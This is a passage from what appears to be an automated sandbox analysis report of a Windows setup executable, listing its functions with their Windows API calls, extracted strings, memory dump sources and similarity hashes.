                                                                                                                            • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                                                                            • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409C34 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409C3E
                                                                                                                            • SizeofResource.KERNEL32(00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 00409C51
                                                                                                                            • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92,?,00000000), ref: 00409C63
                                                                                                                            • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A6B3,00000000,0040AC4A,?,00000001,00000000,00000002,00000000,0040AC92), ref: 00409C74
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Resource$FindLoadLockSizeof
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3473537107-0
                                                                                                                            • Opcode ID: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                                            • Instruction ID: 5c2a5118689e511edc0a9dde7e1b9e77d0383d271af581b44440e1e73e890ea9
                                                                                                                            • Opcode Fuzzy Hash: 66472a43d98f2116202d14454299061058d21427157a3f4f4112e001326967e1
                                                                                                                            • Instruction Fuzzy Hash: B0E07E80B8874726FA6576FB08C7B6B008C4BA570EF00003BB700792C3DDBC8C04462E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405258 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2299586839-0
                                                                                                                            • Opcode ID: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                                            • Instruction ID: 1db3d1c1bb6fab5f91442dea8a08a829cd161d84d3a7e1f0c2fe21aaaafd944f
                                                                                                                            • Opcode Fuzzy Hash: b79b605a6dbd2dbd76dc5df923bc970e8acc9169766131cf64cabc826e101d13
                                                                                                                            • Instruction Fuzzy Hash: 9ED02EA230E2006AE210808B2C84EBB4A9CCEC53A0F00007FF648C3242D2208C029B76
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004026C4 Relevance: 1.5, APIs: 1, Instructions: 20timeCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: SystemTime
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2656138-0
                                                                                                                            • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                                            • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                                                                            • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                                                                            • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405CF4 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetVersionExA.KERNEL32(?,004065F0,00000000,004065FE,?,?,?,?,?,0040A622), ref: 00405D02
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Version
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1889659487-0
                                                                                                                            • Opcode ID: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                                            • Instruction ID: 4c33b40dd65743d8d98a5ffd827b1eb297e5dd4f71424004bfe2d5ab9b26ea54
                                                                                                                            • Opcode Fuzzy Hash: 804cda8d473c4c61bcc63f12479ba9190822d5c554409fc9a119c77cb0a2aa37
                                                                                                                            • Instruction Fuzzy Hash: 00C0126040070186D7109B31DC02B1672D4AB44310F4405396DA4963C2E73C80018A6E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040840C Relevance: .5, Instructions: 545COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                                            • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                                                                            • Opcode Fuzzy Hash: 4d767100099eb102bdc21c19fdb755dbde7929e86d9821f584b3da527505dd0e
                                                                                                                            • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407024 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 86registrylibraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 0040704D
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00407053
                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,00407129,?,00000000,00409918), ref: 004070A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressCloseHandleModuleProc
                                                                                                                            • String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$kernel32.dll
                                                                                                                            • API String ID: 4190037839-2401316094
                                                                                                                            • Opcode ID: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                                            • Instruction ID: c068e7fb85b52830e378cef5638f1cf195f9e270113e5aa630163df598a56aa7
                                                                                                                            • Opcode Fuzzy Hash: 84283e8ecd5f01446eeee6c4ca3ac4597d6d061694d9d4138b3ca6e7d0b19e25
                                                                                                                            • Instruction Fuzzy Hash: 72214170E04209ABDB10EAB5CC55A9E77A9EB48304F60847BA510FB3C1D7BCAE01875E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403A97 Relevance: 15.1, APIs: 10, Instructions: 122fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B1E
                                                                                                                            • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B42
                                                                                                                            • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00403B5E
                                                                                                                            • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00403B7F
                                                                                                                            • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00403BA8
                                                                                                                            • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00403BB2
                                                                                                                            • GetStdHandle.KERNEL32(000000F5), ref: 00403BD2
                                                                                                                            • GetFileType.KERNEL32(?,000000F5), ref: 00403BE9
                                                                                                                            • CloseHandle.KERNEL32(?,?,000000F5), ref: 00403C04
                                                                                                                            • GetLastError.KERNEL32(000000F5), ref: 00403C1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1694776339-0
                                                                                                                            • Opcode ID: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                            • Instruction ID: 6684f6b4d1923fa93cc5777a7ebe0ca766b8c5f16b1f456132d2f0a6dbb27d3d
                                                                                                                            • Opcode Fuzzy Hash: bd0a662ad2dd38144def4530256030cdb08cf53568247c3ffcddd32d1ed1ea18
                                                                                                                            • Instruction Fuzzy Hash: 444194302042009EF7305F258805B237DEDEB4571AF208A3FA1D6BA6E1E77DAE419B5D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004053C4 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 167COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040560C,?,?,?,?,00000000,00000000,00000000,?,004065EB,00000000,004065FE), ref: 004053DE
                                                                                                                              • Part of subcall function 0040520C: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052D7,?,00000000,004053B6), ref: 0040522A
                                                                                                                              • Part of subcall function 00405258: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040545A,?,?,?,00000000,0040560C), ref: 0040526B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoLocale$DefaultSystem
                                                                                                                            • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                                                            • API String ID: 1044490935-665933166
                                                                                                                            • Opcode ID: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                                            • Instruction ID: cc137df54ae1fcbb63b87987e69a719e9c27c4b31815d0debc5c9b1d2781c89a
                                                                                                                            • Opcode Fuzzy Hash: 2becd82198b95216644133442ecc563e5ef80f5327bc31795fb041598c227e39
                                                                                                                            • Instruction Fuzzy Hash: F8515374B00548ABDB00EBA59891A5F7769DB88304F50D5BBB515BB3C6CA3DCA058F1C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004019DC Relevance: 9.1, APIs: 6, Instructions: 59COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00401AB4), ref: 00401A09
                                                                                                                            • LocalFree.KERNEL32(0077A950,00000000,00401AB4), ref: 00401A1B
                                                                                                                            • VirtualFree.KERNEL32(?,00000000,00008000,0077A950,00000000,00401AB4), ref: 00401A3A
                                                                                                                            • LocalFree.KERNEL32(0077B950,?,00000000,00008000,0077A950,00000000,00401AB4), ref: 00401A79
                                                                                                                            • RtlLeaveCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AA4
                                                                                                                            • RtlDeleteCriticalSection.KERNEL32(0040C41C,00401ABB), ref: 00401AAE
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CriticalFreeSection$Local$DeleteEnterLeaveVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3782394904-0
                                                                                                                            • Opcode ID: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                            • Instruction ID: 5447b05044442752c1d56c7733342563ab4b4f61826a3093f511f794066d9233
                                                                                                                            • Opcode Fuzzy Hash: 57d208b384dc2f586c03b96f4df297de7af50f17441c1957de60d2bf1c39d9ad
                                                                                                                            • Instruction Fuzzy Hash: 91116330341280DAD711ABA59EE2F623668B785748F44437EF444B62F2C67C9840CA9D
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403D02 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D9D
                                                                                                                            • ExitProcess.KERNEL32 ref: 00403DE5
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExitMessageProcess
                                                                                                                            • String ID: Error$Runtime error at 00000000$9@
                                                                                                                            • API String ID: 1220098344-1503883590
                                                                                                                            • Opcode ID: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                            • Instruction ID: db3008c0e6bc5d60e05df0545d3e9f81ce91e923819fa2a9fb93000da4b6b716
                                                                                                                            • Opcode Fuzzy Hash: 0b7abc0913d0e9b6482778e2bb40dc1e8adb9ed549d30d0444a38b969016e341
                                                                                                                            • Instruction Fuzzy Hash: B521F830A04341CAE714EFA59AD17153E98AB49349F04837BD500B73E3C77C8A45C76E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004036B8 Relevance: 7.6, APIs: 5, Instructions: 55memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 004036F2
                                                                                                                            • SysAllocStringLen.OLEAUT32(?,00000000), ref: 004036FD
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 00403710
                                                                                                                            • SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 0040371A
                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00403729
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ByteCharMultiWide$AllocString
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 262959230-0
                                                                                                                            • Opcode ID: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                                            • Instruction ID: 1285967c487f36a4f1f77a8b8e1f1fe351824cacfdb80e5859a13ebcd08b75b2
                                                                                                                            • Opcode Fuzzy Hash: 759139aa8138bb4f1b890a81a570935fc2f09484a8ccbcda4eb7e9d11bc9ffe5
                                                                                                                            • Instruction Fuzzy Hash: 17F068A13442543AF56075A75C43FAB198CCB45BAEF10457FF704FA2C2D8B89D0492BD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00406E10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113registryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000,00409918,00000000), ref: 00406E4C
                                                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,70000000,?,?,00000000,00000000,00000000,?,00000000,00406F48,?,00000000), ref: 00406EBC
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: QueryValue
                                                                                                                            • String ID: )q@
                                                                                                                            • API String ID: 3660427363-2284170586
                                                                                                                            • Opcode ID: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                                            • Instruction ID: 22a93fbabe645b78fd14ced98f65bd4bcb22fe3fd6f8222f7fa8e6a3c98f8dfc
                                                                                                                            • Opcode Fuzzy Hash: 32d2d681139902fa63b50b1e86c1c6042aee641263ad409bd5d16b68eaa8278f
                                                                                                                            • Instruction Fuzzy Hash: E6415E31D0021AAFDB21DF95C881BAFB7B8EB04704F56447AE901F7280D738AF108B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409C88 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 30windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • MessageBoxA.USER32(00000000,00000000,Setup,00000010), ref: 00409CBD
                                                                                                                            Strings
                                                                                                                            • The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si, xrefs: 00409CA1
                                                                                                                            • Setup, xrefs: 00409CAD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Message
                                                                                                                            • String ID: Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will install... Do you wish to continue? prompt at the beginning of Setup./SILENT, /VERYSILENTInstructs Setup to be silent or very si
                                                                                                                            • API String ID: 2030045667-3271211647
                                                                                                                            • Opcode ID: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                                            • Instruction ID: b8b600ed6bdfe48e96a015bdf4867c85bc36f5512d0f27a60c0f94c744360238
                                                                                                                            • Opcode Fuzzy Hash: bc66b1cf8cea732a030952d466b76090b354ad7a58696f118c0a4b0261ee3717
                                                                                                                            • Instruction Fuzzy Hash: 8EE0E5302482087EE311EA528C13F6A7BACE789B04F600477F900B15C3D6786E00A068
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004030DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(00000000,0040A60E), ref: 004030E3
                                                                                                                            • GetCommandLineA.KERNEL32(00000000,0040A60E), ref: 004030EE
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CommandHandleLineModule
                                                                                                                            • String ID: U1hd.@
                                                                                                                            • API String ID: 2123368496-2904493091
                                                                                                                            • Opcode ID: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                            • Instruction ID: 0f926add87520dc699e98d27074396f9fab16295c11a520b4b5863bd90c7cb52
                                                                                                                            • Opcode Fuzzy Hash: ab44cebb113f23cc453db0582047ce3f33ed2b100303cb8959b7892e21e32e4b
                                                                                                                            • Instruction Fuzzy Hash: 03C01274541300CAD328AFF69E8A304B990A385349F40823FA608BA2F1CA7C4201EBDD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004094D8 Relevance: 5.0, APIs: 4, Instructions: 45sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 004094F7
                                                                                                                            • Sleep.KERNEL32(?,?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409507
                                                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 0040951A
                                                                                                                            • GetLastError.KERNEL32(?,?,?,0000000D,?,0040ABED,000000FA,00000032,0040AC54), ref: 00409524
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.3334549008.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.3332499224.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334578706.000000000040B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.3334613563.0000000000411000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_JgqIdYSSt70LQLRUqfTzKJw8.jbxd
